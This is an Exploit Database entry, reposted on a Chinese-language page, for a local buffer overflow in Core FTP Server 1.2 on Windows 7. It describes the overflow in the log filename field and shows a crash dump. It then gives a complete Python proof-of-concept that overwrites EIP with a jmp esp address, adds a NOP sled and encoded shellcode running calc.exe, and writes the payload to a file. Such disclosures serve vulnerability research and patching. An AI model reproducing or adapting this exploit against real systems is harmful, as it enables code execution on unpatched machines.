Core FTP Server 1.2 – Local Buffer Overflow

• Exploit Database
• 16 阅读

• 作者： INSECT.B
  日期： 2016-02-22
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/39480/

• #-*- coding: utf-8 -*-
  #
  # Exploit Title : Core FTP Server v1.2 - BufferOverflow POC
  # Date: 2016-02-22
  # Author: INSECT.B
  # Facebook : https://www.facebook.com/B.INSECT00
  #	GitHub : binsect00
  # Blog : http://binsect00.tistory.com
  # Vendor Homepage : http://www.coreftp.com/
  # Software Link: 
  # Version: 1.2
  # Tested on: Windows7 Professional SP1 En x86 
  # CVE : N/A
  
  '''
  [+] Type : Buffer overflow
  [+] Detail : 
  [-]The vulnerability has the most typical Buffer overflow vulnerabilities. 
  [-]Insert string into 'Log filename(include path)' field that [setup] - [new] - [Logging options] - [More] 
  [-]'Log filename(include path)' field is no limit to the length and does not check the length
  [-]Insert string "A"*1500 and press Ok, OK
  [-] crash info
  (3bc.e28): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=00000000 ebx=00000111 ecx=41414141 edx=0012a3d9 esi=00502438 edi=00000001
  eip=41414141 esp=00129bf0 ebp=00129bf8 iopl=0 nv up ei pl nz na po nc
  cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010202
  41414141 ?????
  '''
  import struct
  
  junk = "A" * 312
  EIP = struct.pack("<L",0x7795163b)# USER32!gSharedInfo+0x181fb:
  									# 7795163b ffe4jmp esp
  nop = "\x90" * 10
  
  #windows/exec calc.exe
  #encode : alpha_mixed
  sehll = (
  "\x89\xe5\xdb\xde\xd9\x75\xf4\x59\x49\x49\x49\x49\x49\x49" +
  "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" +
  "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" +
  "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" +
  "\x75\x4a\x49\x59\x6c\x68\x68\x6f\x72\x67\x70\x77\x70\x47" +
  "\x70\x75\x30\x6f\x79\x4a\x45\x44\x71\x49\x50\x30\x64\x6c" +
  "\x4b\x56\x30\x34\x70\x4e\x6b\x61\x42\x56\x6c\x6c\x4b\x71" +
  "\x42\x77\x64\x4c\x4b\x32\x52\x67\x58\x76\x6f\x6c\x77\x71" +
  "\x5a\x31\x36\x65\x61\x49\x6f\x4e\x4c\x67\x4c\x53\x51\x61" +
  "\x6c\x37\x72\x44\x6c\x47\x50\x4f\x31\x38\x4f\x54\x4d\x36" +
  "\x61\x58\x47\x58\x62\x69\x62\x46\x32\x51\x47\x6c\x4b\x61" +
  "\x42\x46\x70\x6c\x4b\x52\x6a\x75\x6c\x6e\x6b\x42\x6c\x34" +
  "\x51\x30\x78\x79\x73\x72\x68\x65\x51\x7a\x71\x30\x51\x6c" +
  "\x4b\x53\x69\x57\x50\x43\x31\x58\x53\x4c\x4b\x62\x69\x76" +
  "\x78\x58\x63\x75\x6a\x37\x39\x4c\x4b\x75\x64\x6c\x4b\x36" +
  "\x61\x4e\x36\x54\x71\x69\x6f\x6e\x4c\x5a\x61\x5a\x6f\x54" +
  "\x4d\x43\x31\x58\x47\x45\x68\x59\x70\x32\x55\x4b\x46\x64" +
  "\x43\x51\x6d\x58\x78\x45\x6b\x31\x6d\x55\x74\x50\x75\x48" +
  "\x64\x42\x78\x6c\x4b\x32\x78\x77\x54\x67\x71\x38\x53\x63" +
  "\x56\x4c\x4b\x66\x6c\x62\x6b\x6e\x6b\x52\x78\x35\x4c\x63" +
  "\x31\x68\x53\x6e\x6b\x45\x54\x4c\x4b\x46\x61\x5a\x70\x6c" +
  "\x49\x47\x34\x65\x74\x31\x34\x61\x4b\x31\x4b\x75\x31\x43" +
  "\x69\x52\x7a\x36\x31\x6b\x4f\x59\x70\x73\x6f\x63\x6f\x32" +
  "\x7a\x4c\x4b\x45\x42\x78\x6b\x6e\x6d\x43\x6d\x31\x7a\x63" +
  "\x31\x6c\x4d\x6c\x45\x4e\x52\x75\x50\x77\x70\x47\x70\x50" +
  "\x50\x63\x58\x66\x51\x4e\x6b\x62\x4f\x6b\x37\x6b\x4f\x7a" +
  "\x75\x6f\x4b\x4c\x30\x68\x35\x6f\x52\x61\x46\x43\x58\x69" +
  "\x36\x7a\x35\x4d\x6d\x4f\x6d\x69\x6f\x68\x55\x65\x6c\x56" +
  "\x66\x33\x4c\x37\x7a\x4d\x50\x49\x6b\x79\x70\x51\x65\x37" +
  "\x75\x4f\x4b\x31\x57\x75\x43\x61\x62\x70\x6f\x73\x5a\x73" +
  "\x30\x46\x33\x39\x6f\x6a\x75\x70\x63\x45\x31\x42\x4c\x63" +
  "\x53\x74\x6e\x71\x75\x31\x68\x73\x55\x57\x70\x41\x41"
  )
  payload = junk + EIP + nop + sehll
  
  with open("CoreFTPServer_Ex.txt","wb") as f :
  	f.write(payload)